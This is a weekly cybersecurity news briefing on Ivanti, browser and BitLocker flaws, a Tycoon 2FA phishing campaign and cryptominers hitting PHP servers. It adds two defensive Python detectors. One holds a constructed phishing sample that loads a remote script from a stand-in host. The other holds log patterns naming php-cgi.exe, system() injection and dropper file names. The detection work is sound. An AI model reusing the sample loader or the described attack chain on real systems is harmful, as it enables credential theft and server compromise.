Cyber Security Weekly Briefing, 4-10 January

January 10, 2025

Ivanti warns of two vulnerabilities in Connect Secure and other products, one under active exploitation

Software vendor Ivanti has warned of two critical vulnerabilities in its products, identified as CVE-2025-0282 and CVE-2025-0283.

  • The first, with a CVSSv3 score of 9.0, allows unauthenticated remote attackers to execute arbitrary code via a stack-based buffer overflow and affects several versions of Ivanti Connect Secure, Policy Secure and Neurons for ZTA Gateways.
  • The second, with a CVSSv3 score of 7.0, allows authenticated local attackers to escalate privileges.

Mandiant research identified active exploitation of CVE-2025-0282 as of mid-December 2024. Ivanti confirmed that this vulnerability has already been exploited in Connect Secure devices, although it claims no evidence of exploitation in Policy Secure or ZTA.

To mitigate the risk, Ivanti recommends running its Integrity Checker Tool (ICT) to detect compromise, upgrading to version 22.7R2.5 and then scanning again with ICT. As a precaution, it also suggests performing a factory reset before applying the upgrade.

Chrome and Firefox updates

Google and Mozilla have released security updates for their Chrome and Firefox browsers to address several high-severity security vulnerabilities.

  • Google has released Chrome 131, an update that fixes four vulnerabilities including CVE-2025-0291 (CVSSv3 8.3), a type confusion flaw in the V8 JavaScript engine that could allow an attacker to execute arbitrary code remotely.
  • Firefox 134 fixes 11 vulnerabilities, three of which are high severity. The most important is CVE-2025-0247 (CVSSv3 8.8), a memory corruption issue that could be exploited to execute arbitrary code.

It should be noted that neither Google nor Mozilla has seen active exploitation of these vulnerabilities.

Windows 11 encryption can be bypassed through an old BitLocker vulnerability

Security researcher Thomas Lambertz showed at the Chaos Communication Congress that the BitLocker vulnerability popularly known as bitpixie (CVE-2023-21563, CVSSv3 6.8 according to Microsoft) can still be exploited even though the company released a patch in January 2023.

Lambertz demonstrated how it is possible to bypass BitLocker encryption in Windows 11 without physically opening the PC. The attack exploits an outdated boot loader via Secure Boot, which allows attackers to extract the encryption keys. All that is required is temporary physical access to the device and a network connection.

To mitigate the risk, it is recommended to configure a custom BitLocker PIN or to disable network access in the BIOS. However, even a USB network adapter could be used to carry out the attack.

New Tycoon 2FA phishing campaign using fake voicemail messages

Researchers at Validin have identified a new method by which the Phishing-as-a-Service (PhaaS) Tycoon 2FA platform enables cybercriminals to launch phishing attacks targeting two-factor authentication (2FA).

The platform already offers custom templates that mimic legitimate 2FA prompts and automates the management of large-scale phishing campaigns. In the newly observed campaigns, it distributes an HTML file that shows a fake voicemail page before redirecting the victim to a fake Outlook authentication page.

Static analysis of the HTML file reveals variables that store the victim's email address and a Base64-encoded blob. The blob contains the HTML code of the fake page together with a JavaScript script that is fetched from a remote URL after four seconds; it is this script, once decrypted with AES, that carries out the malicious actions.

Validin's research also found that the PHP file res444.php used in this campaign appears on several other domains, pointing to shared infrastructure that is still active and that defenders can act on.
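The static-analysis traits described above (a variable holding the victim's email, a Base64 blob that decodes to the fake page, a script pulled from a remote URL after a delay, and the res444.php file name) translate directly into a triage check for HTML attachments. The following is an added example written for this briefing, not Validin's tooling or any code from the campaign; res444.php is the only name taken from the text, and the sample attachment, the blob-length threshold and the regexes are constructed assumptions. It decodes candidate blobs and inspects the result without executing any JavaScript.

```python
import base64
import binascii
import re

# res444.php is the file name from the briefing; all other thresholds and regexes are assumptions.
KNOWN_STAGER = "res444.php"
B64_RE = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")
DELAY_RE = re.compile(r"setTimeout\s*\(.*?,\s*(\d+)\s*\)", re.S)
REMOTE_SRC_RE = re.compile(r"""\bsrc\s*=\s*["'](https?://[^"']+)["']""", re.I)
EMAIL_VAR_RE = re.compile(r"(?:var|let|const)\s+\w*(?:email|mail|user)\w*\s*=", re.I)

# Constructed inner page (not a real lure): a voicemail notice plus a script that pulls
# a second stage from a remote URL after a four-second delay.
_INNER_PAGE = (
    "<div>You have a new voicemail</div>"
    "<script>setTimeout(function(){var s=document.createElement('script');"
    "s.src='https://stager.example.invalid/res444.php';"
    "document.body.appendChild(s);},4000);</script>"
)
_BLOB = base64.b64encode(_INNER_PAGE.encode()).decode()

# Constructed outer attachment, mirroring the two variables the briefing describes
SAMPLE_ATTACHMENT = (
    "<html><body><script>\n"
    'var victimEmail = "user@example.invalid";\n'
    f'var payload = "{_BLOB}";\n'
    "</script></body></html>"
)


def _inspect_script(text: str, findings: dict) -> None:
    """Record delayed remote script loads and known stager names found in a fragment."""
    delays = [int(d) for d in DELAY_RE.findall(text)]
    for url in REMOTE_SRC_RE.findall(text):
        if KNOWN_STAGER in url:
            findings["known_stager"] = True
        if delays:
            findings["delayed_remote_scripts"].append((max(delays), url))


def triage_html(html: str) -> dict:
    """Static triage of an HTML attachment: returns a findings dict, runs no JavaScript."""
    findings = {
        "stores_email": bool(EMAIL_VAR_RE.search(html)),
        "embedded_html_blobs": 0,
        "delayed_remote_scripts": [],
        "known_stager": False,
    }
    for blob in B64_RE.findall(html):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
        except (binascii.Error, ValueError):
            continue  # long token that is not valid Base64
        # Only count blobs that decode to markup, the trait the briefing describes
        if re.search(r"<(?:html|body|div|script|form)\b", decoded, re.I):
            findings["embedded_html_blobs"] += 1
            _inspect_script(decoded, findings)
    # The outer file may also carry delayed loaders in clear text
    _inspect_script(html, findings)
    return findings


if __name__ == "__main__":
    for key, value in triage_html(SAMPLE_ATTACHMENT).items():
        print(f"{key}: {value}")
```

A mail gateway or sandbox pre-filter can run `triage_html` over every HTML attachment and escalate when an email-holding variable, a markup-bearing blob and a delayed remote script load all occur together; any single trait on its own is common in legitimate pages.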

Malicious actors target PHP servers with cryptominers

SANS researchers have detected a URL targeting vulnerable PHP servers, likely by exploiting CVE-2024-4577 (CVSSv3 9.8) or misconfigurations that expose “php-cgi.exe” publicly, and using it to run multiple commands through the system() function. The payload downloads a malicious executable named “dr0p.exe” from a remote server and runs it locally, and also attempts to download the same executable with wget while skipping SSL certificate verification.

The server is reportedly based in the US and hosts EvilBit Block Explorer on port 80, in addition to exposing ports 22, 110 and 6664. The analysis further revealed that the malware launches packetcrypt.exe, which most likely corresponds to a cryptocurrency miner, passing a PKT Classic wallet address as an argument.

SANS research revealed that the cryptocurrency mined on the compromised PHP servers was PKTC, a proof-of-work coin inherited from the PacketCrypt project.
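The activity described in this item leaves two traces in web-server access logs: requests that reach php-cgi.exe directly (with system() calls in the query string when code is being pushed through it) and follow-up fetches of the dropper and miner file names. The script below is an added example for this briefing, not SANS code; the file names dr0p.exe, packetcrypt.exe and php-cgi.exe come from the text, while the sample log lines, IP addresses and the combined-log regex are constructed assumptions.

```python
import re
from urllib.parse import unquote

# File names taken from the briefing; every other threshold or pattern is an assumption.
DROPPER_NAMES = ("dr0p.exe", "packetcrypt.exe")
CGI_BINARY = "php-cgi.exe"

# Request field of a combined-format access log: "METHOD TARGET HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log (not real traffic): a benign request, a direct hit on the
# CGI binary carrying a system() call, a bare probe of the binary, a dropper fetch.
SAMPLE_LOG = """\
203.0.113.10 - - [08/Jan/2025:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.77 - - [08/Jan/2025:10:01:05 +0000] "POST /php-cgi/php-cgi.exe?%3C%3Fphp+system%28%27REDACTED%27%29%3B HTTP/1.1" 200 84 "-" "curl/8.4.0"
203.0.113.77 - - [08/Jan/2025:10:01:06 +0000] "GET /php-cgi/php-cgi.exe HTTP/1.1" 200 84 "-" "curl/8.4.0"
198.51.100.5 - - [08/Jan/2025:10:01:09 +0000] "GET /dr0p.exe HTTP/1.1" 404 0 "-" "Wget/1.21"
203.0.113.10 - - [08/Jan/2025:10:02:00 +0000] "GET /about.html HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""


def classify(line: str) -> list[str]:
    """Return the reasons one log line looks suspicious (empty list if clean)."""
    reasons: list[str] = []
    match = REQUEST_RE.search(line)
    if not match:
        return reasons
    path, _, query = match.group("target").partition("?")
    # Decode percent-encoding and '+' so obfuscated query strings are inspected in clear
    decoded_path = unquote(path).lower()
    decoded_query = unquote(query.replace("+", " ")).lower()
    if decoded_path.endswith(CGI_BINARY):
        # Public reach of the CGI binary is the misconfiguration the briefing describes
        reasons.append("request reaches php-cgi.exe directly")
        if "system(" in decoded_query:
            reasons.append("system() call in query string")
    for name in DROPPER_NAMES:
        if name in decoded_path or name in decoded_query:
            reasons.append(f"reference to dropper name {name}")
    return reasons


def scan(log_text: str) -> list[tuple[int, str, list[str]]]:
    """Scan a whole log; return (line number, client IP, reasons) for every flagged line."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        reasons = classify(line)
        if reasons:
            hits.append((number, line.split(" ", 1)[0], reasons))
    return hits


if __name__ == "__main__":
    for number, ip, reasons in scan(SAMPLE_LOG):
        print(f"line {number} from {ip}: {'; '.join(reasons)}")
```

The first finding, any external request reaching php-cgi.exe, is the one worth alerting on regardless of payload: on a correctly deployed server that binary should never be addressable from the network, so even a bare probe indicates the exposed-CGI misconfiguration the item warns about.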